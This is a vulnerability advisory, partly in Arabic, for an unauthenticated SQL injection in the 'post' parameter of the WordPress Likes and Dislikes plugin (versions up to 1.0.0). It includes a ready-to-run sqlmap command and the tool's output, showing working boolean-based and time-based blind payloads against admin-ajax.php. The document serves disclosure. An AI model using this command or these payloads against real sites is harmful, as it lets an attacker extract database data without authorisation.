
Likes and Dislikes Plugin <= 1.0.0 - حقن SQL بدون مصادقة
إضافة Likes and Dislikes <= 1.0.0 - حقن SQL بدون مصادقة
إن إضافة Likes and Dislikes الخاصة بووردبريس معرضة لثغرة حقن SQL عبر معامل 'post' في جميع الإصدارات حتى 1.0.0 وما يشملها، وذلك بسبب عدم كفاية تهريب المعامل المقدم من المستخدم وعدم الإعداد الكافي لاستعلام SQL الموجود. وهذا يتيح للمهاجمين غير المصادق عليهم إلحاق استعلامات SQL إضافية بالاستعلامات القائمة بالفعل، والتي يمكن استخدامها لاستخراج معلومات حساسة من قاعدة البيانات.
python3 sqlmap.py -u 'http://kubernetes.docker.internal:8999/wp-admin/admin-ajax.php' --data='action=my_likes_dislikes_action&post=1&state=dislike' --level=2 --risk=2 --dbms='MySQL' -p post --random-agent
sqlmap identified the following injection point(s) with a total of 372 HTTP(s) requests:
---
Parameter: post (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: action=my_likes_dislikes_action&post=1 AND 8197=(SELECT (CASE WHEN (8197=8197) THEN 8197 ELSE (SELECT 7036 UNION SELECT 3343) END))-- -&state=dislike
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: action=my_likes_dislikes_action&post=1 AND (SELECT 7318 FROM (SELECT(SLEEP(5)))OIPg)&state=dislike
---